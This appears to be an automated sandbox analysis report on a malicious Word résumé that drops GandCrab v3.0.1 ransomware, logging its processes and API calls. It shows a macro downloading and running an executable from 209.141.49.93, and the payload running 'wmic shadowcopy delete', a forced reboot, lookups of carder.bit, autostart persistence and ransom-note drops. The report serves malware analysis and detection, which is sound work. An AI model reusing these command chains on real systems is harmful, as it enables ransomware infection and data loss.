Encrypted Doc Dropping GandCrab v3.0.1 | Sequential Behavior
VTI SCORE: 100/100
Target: win7_64_sp1-mso2016 | ms_office
Classification: Dropper, Trojan, Downloader, Ransomware

be54bb05adbda29316ba03d61b3365d8a03e1121a39ae492078787aff4f1248f (SHA256)

Faith's Resume.doc

Word Document

Created at 2018-06-04 08:51:00

Notifications (2/2)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The operating system was rebooted during the analysis.

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x924 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" -
#2 0xa44 Child Process Medium qwerty.exe C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe #1
#4 0xb04 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #2
#5 0xbc4 Child Process System (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #2
#6 0x894 Child Process System (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #2
#9 0x66c Child Process System (Elevated) cmd.exe "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f #2
#10 0x8d8 Child Process System (Elevated) shutdown.exe shutdown -r -t 60 -f #9
#12 0x79c Child Process System (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome #2
#13 0x244 Child Process System (Elevated) ie4uinit.exe "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon #12
#14 0x49c Child Process System (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1948 CREDAT:14337 #12
#15 0xa20 Child Process System (Elevated) ssvagent.exe "C:\PROGRA~2\Java\jre7\bin\ssvagent.exe" -new #14
#25 0x7cc Autostart High (Elevated) hojffa.exe "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe" -
#27 0x418 Child Process High (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #25
#28 0x5e8 Child Process High (Elevated) nslookup.exe nslookup carder.bit ns1.wowservers.ru #25
#29 0x614 Child Process High (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #25
#33 0x690 Child Process High (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome #25
#34 0x22c Child Process High (Elevated) iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1680 CREDAT:14337 #33

Behavior Information - Sequential View

Process #1: winword.exe
305 7
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:15, Reason: Analysis Target
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:05:05
OS Process Information
Information Value
PID 0x924
Parent PID 0x5a8 (Unknown)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
For performance reasons, the remaining 344 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\local\temp\qwerty.exe 233.01 KB MD5: 768f77e57ea0ebe6c13060b74653b32f
SHA1: c7834bf82fa64a192a259bfb79a0892d230278da
SHA256: 589e188602c4a24c68bc095c1105894a5e97e1df6218eaead89b7ab9a4e88eac
False
Threads
Thread 0x928
305 7
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:51:30 (UTC) True 1
System Get Time type = Ticks, time = 90667 True 1
System Get Info type = Operating System True 1
Module Get Handle module_name = c:\program files\microsoft office\root\office16\winword.exe, base_address = 0x13f6d0000 True 1
Module Load module_name = Comctl32.dll, base_address = 0x7fefb970000 True 1
Module Get Handle module_name = MSI.DLL, base_address = 0x7fef9b60000 True 1
Module Get Address module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fef9be3b3c True 1
Module Get Address module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fef9bda13c True 1
Module Get Address module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fef9be1618 True 1
Module Get Address module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fef9bdf088 True 1
Module Get Handle module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 False 1
Module Load module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee2c90000 True 1
Module Get Address module_name = Unknown module name, function = MsoVBADigSigCallDlg, address_out = 0x7fee2d972c0 True 1
Module Get Address module_name = Unknown module name, function = MsoVbaInitSecurity, address_out = 0x7fee2d060b0 True 1
Module Get Address module_name = Unknown module name, function = MsoFIEPolicyAndVersion, address_out = 0x7fee2cb1a60 True 1
Module Get Address module_name = Unknown module name, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee2d05f50 True 1
Module Get Address module_name = Unknown module name, function = MsoFInitOffice, address_out = 0x7fee2caf000 True 1
Module Get Address module_name = Unknown module name, function = MsoUninitOffice, address_out = 0x7fee2c9e860 True 1
Module Get Address module_name = Unknown module name, function = MsoFGetFontSettings, address_out = 0x7fee2c93fc0 True 1
Module Get Address module_name = Unknown module name, function = MsoRgchToRgwch, address_out = 0x7fee2ca2380 True 1
Module Get Address module_name = Unknown module name, function = MsoHrSimpleQueryInterface, address_out = 0x7fee2c97b80 True 1
Module Get Address module_name = Unknown module name, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee2c97b20 True 1
Module Get Address module_name = Unknown module name, function = MsoFCreateControl, address_out = 0x7fee2c98730 True 1
Module Get Address module_name = Unknown module name, function = MsoFLongLoad, address_out = 0x7fee2dd3260 True 1
Module Get Address module_name = Unknown module name, function = MsoFLongSave, address_out = 0x7fee2dd3280 True 1
Module Get Address module_name = Unknown module name, function = MsoFGetTooltips, address_out = 0x7fee2ca1f40 True 1
Module Get Address module_name = Unknown module name, function = MsoFSetTooltips, address_out = 0x7fee2d06370 True 1
Module Get Address module_name = Unknown module name, function = MsoFLoadToolbarSet, address_out = 0x7fee2cf4590 True 1
Module Get Address module_name = Unknown module name, function = MsoFCreateToolbarSet, address_out = 0x7fee2c955b0 True 1
Module Get Address module_name = Unknown module name, function = MsoHpalOffice, address_out = 0x7fee2ca0240 True 1
Module Get Address module_name = Unknown module name, function = MsoFWndProcNeeded, address_out = 0x7fee2c93d10 True 1
Module Get Address module_name = Unknown module name, function = MsoFWndProc, address_out = 0x7fee2c96d30 True 1
Module Get Address module_name = Unknown module name, function = MsoFCreateITFCHwnd, address_out = 0x7fee2c93d40 True 1
Module Get Address module_name = Unknown module name, function = MsoDestroyITFC, address_out = 0x7fee2c9e6f0 True 1
Module Get Address module_name = Unknown module name, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee2c9df40 True 1
Module Get Address module_name = Unknown module name, function = MsoFGetComponentManager, address_out = 0x7fee2c97bf0 True 1
Module Get Address module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee2c9fcd0 True 1
Module Get Address module_name = Unknown module name, function = MsoWideCharToMultiByte, address_out = 0x7fee2c98b20 True 1
Module Get Address module_name = Unknown module name, function = MsoHrRegisterAll, address_out = 0x7fee2d92ef0 True 1
Module Get Address module_name = Unknown module name, function = MsoFSetComponentManager, address_out = 0x7fee2ca42c0 True 1
Module Get Address module_name = Unknown module name, function = MsoFCreateStdComponentManager, address_out = 0x7fee2c93e20 True 1
Module Get Address module_name = Unknown module name, function = MsoFHandledMessageNeeded, address_out = 0x7fee2c9ab10 True 1
Module Get Address module_name = Unknown module name, function = MsoPeekMessage, address_out = 0x7fee2c9a7d0 True 1
Module Get Address module_name = Unknown module name, function = MsoFCreateIPref, address_out = 0x7fee2c91550 True 1
Module Get Address module_name = Unknown module name, function = MsoDestroyIPref, address_out = 0x7fee2c9e830 True 1
Module Get Address module_name = Unknown module name, function = MsoChsFromLid, address_out = 0x7fee2c913d0 True 1
Module Get Address module_name = Unknown module name, function = MsoCpgFromChs, address_out = 0x7fee2c96660 True 1
Module Get Address module_name = Unknown module name, function = MsoSetLocale, address_out = 0x7fee2c91500 True 1
Module Get Address module_name = Unknown module name, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee2c93dd0 True 1
Module Get Address module_name = Unknown module name, function = MsoSetVbaInterfaces, address_out = 0x7fee2d971e0 True 1
Module Get Address module_name = Unknown module name, function = MsoGetControlInstanceId, address_out = 0x7fee2d66d10 True 1
Module Get Address module_name = Unknown module name, function = VbeuiFIsEdpEnabled, address_out = 0x7fee2dd98e0 True 1
Module Get Address module_name = Unknown module name, function = VbeuiEnterpriseProtect, address_out = 0x7fee2dd9830 True 1
Environment Get Environment String name = DDRYBUR False 1
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
Module Load module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x7fef5e70000 True 1
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
System Get Info type = Operating System True 1
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Licenses True 1
Registry Read Value reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } False 1
Module Load module_name = OLEAUT32.DLL, base_address = 0x7fefe910000 True 1
Module Get Address module_name = Unknown module name, function = SysFreeString, address_out = 0x7fefe911320 True 1
Module Get Address module_name = Unknown module name, function = LoadTypeLib, address_out = 0x7fefe91f1e0 True 1
Module Get Address module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x7fefe96caa0 True 1
Module Get Address module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7fefe9a1760 True 1
Module Get Address module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 True 1
Module Get Address module_name = Unknown module name, function = OleTranslateColor, address_out = 0x7fefe93c760 True 1
Module Get Address module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7fefe96ecd0 True 1
Module Get Address module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x7fefe96e840 True 1
Module Get Address module_name = Unknown module name, function = OleLoadPicture, address_out = 0x7fefe97f420 True 1
Module Get Address module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x7fefe974ec0 True 1
Module Get Address module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x7fefe979350 True 1
Module Get Address module_name = Unknown module name, function = OleIconToCursor, address_out = 0x7fefe946e40 True 1
Module Get Address module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7fefe91a550 True 1
Module Get Address module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x7fefe97f320 True 1
Window Create class_name = ThunderMain, wndproc_parameter = 0 True 1
System Get Info type = Operating System True 1
Module Get Handle module_name = c:\windows\system32\user32.dll, base_address = 0x76df0000 True 1
Module Get Address module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x76e094f0 True 1
Module Get Address module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x76e05f08 True 1
Module Get Address module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x76e02b00 True 1
Module Get Address module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x76dfab64 True 1
Module Get Address module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x76e05c30 True 1
Module Get Address module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x76dfa730 True 1
Module Get Address module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x76dfa5b4 True 1
System Get Info type = Operating System True 1
Module Get Handle module_name = oleaut32.dll, base_address = 0x7fefe910000 True 1
Module Get Address module_name = Unknown module name, function = DispCallFunc, address_out = 0x7fefe912270 True 1
Module Get Address module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7fefe91a550 True 1
Module Get Address module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 True 1
Module Get Address module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7fefe99dbd0 True 1
Module Get Address module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7fefe915c90 True 1
Module Get Address module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7fefe916330 True 1
Module Get Address module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7fefe9366c0 True 1
Module Get Address module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7fefe914710 True 1
Module Get Address module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7fefe9148f0 True 1
Module Get Address module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7fefe94b640 True 1
Module Get Address module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7fefe94b360 True 1
Module Get Address module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7fefe952640 True 1
Module Get Address module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7fefe9358a0 True 1
Module Get Address module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7fefe935820 True 1
Module Get Address module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7fefe94af20 True 1
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7fefe96a0c0 True 1
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7fefe9a2160 True 1
Module Get Address module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7fefe935af0 True 1
Module Get Address module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7fefe935a90 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7fefe935a60 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7fefe935a30 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7fefe9160b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7fefe913e90 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7fefe969f80 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormat, address_out = 0x7fefe999b20 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7fefe999aa0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7fefe999990 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7fefe999890 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7fefe999770 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7fefe97b8d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMonthName, address_out = 0x7fefe97b800 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAdd, address_out = 0x7fefe9948e0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAnd, address_out = 0x7fefe999470 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCat, address_out = 0x7fefe9996a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDiv, address_out = 0x7fefe992fe0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarEqv, address_out = 0x7fefe999cf0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarIdiv, address_out = 0x7fefe998ff0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarImp, address_out = 0x7fefe999c00 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMod, address_out = 0x7fefe998e60 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMul, address_out = 0x7fefe993690 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarOr, address_out = 0x7fefe9992d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarPow, address_out = 0x7fefe992e80 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarSub, address_out = 0x7fefe993f90 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarXor, address_out = 0x7fefe9991a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAbs, address_out = 0x7fefe977c30 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFix, address_out = 0x7fefe977a60 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarInt, address_out = 0x7fefe977890 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNeg, address_out = 0x7fefe977ea0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNot, address_out = 0x7fefe999600 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarRound, address_out = 0x7fefe9776a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCmp, address_out = 0x7fefe9983f0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecAdd, address_out = 0x7fefe943070 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecCmp, address_out = 0x7fefe94d700 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarBstrCat, address_out = 0x7fefe94d890 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7fefe92caf0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7fefe938a00 True 1
Fn
System Get Time type = Local Time, time = 2018-06-04 08:51:32 (Local Time) True 2
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 138, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Module Get Address module_name = Unknown module name, address_out = 0x7fee2c9fcd0 True 1
COM Get Class ID cls_id = ED8C108E-4349-11D2-91A4-00C04F7969E8, prog_id = Microsoft.XMLHTTP True 1
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Inet Open Connection protocol = http, server_name = 209.141.49.93, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /hello.bin True 1
Inet Send HTTP Request url = http://209.141.49.93/hello.bin True 1
Inet Read Response size_out = 238601 True 1
Inet Receive HTTP Status status = 200 True 1
COM Get Class ID cls_id = 00000566-0000-0010-8000-00AA006D2EA4, prog_id = ADODB.Stream True 1
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Inet Read Response size_out = 238601 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe True 1
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 238601 True 1
Process Create process_name = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, os_pid = 0xa44, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
System Get Cursor x_out = 636, y_out = 820 True 1
Process #2: qwerty.exe
Information Value
ID #2
File Name c:\users\aetadzjz\appdata\local\temp\qwerty.exe
Command Line C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:31, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:04:49
OS Process Information
Information Value
PID 0xa44
Parent PID 0x924 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xA48, 0xA50, 0xA54, 0xA58, 0xA60, 0xA68, 0xA6C, 0xA70, 0xA74, 0xA78, 0xA7C, 0xAFC, 0xB00, 0xB24, 0x890, 0x90C
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x75700000 0x75744fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75890000 0x75894fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x770a0000 0x770a2fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 202 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
Type Installer Target Size Information Actions
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe 233.01 KB MD5: f563adf489b43a4fa6705a43b66cefd4
SHA1: 4889f1ba1af9d3dc1a31ab30ab782c64d06ba592
SHA256: 18e29dfe749c58626179e04ced6b005527a3185a0f309da0b5dff50b89a19011
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ipv4bot_whatismyipaddress_com[1].htm 0.01 KB MD5: 01b9ff51a6529cd9d1645f59c2258904
SHA1: 73c1c875bf293b3dbb526427e46fbe2b6b58f248
SHA256: 53f9a285a7e5f0ccb8d76157f08a7c386d614ccd2f3501e07734bb7d7edc8bbf
False
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ayphore[1].txt 0.54 KB MD5: 73c9cca74dd40031a8ef7792ad063a43
SHA1: f7999e832359a72b8e01641e8e1cb8c249e23a8e
SHA256: b3831ed72d16f2ae14082a63fd0f2be928fb9c6b243295d5758fa0611419302c
False
c:\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\onenote\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\onenote\16.0\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\outlook\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\powerpoint\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\proof\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-2345716840-1148442690-1481144037-1000\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\protect\s-1-5-21-3111613574-2524581245-2586426736-500\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\publisher\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
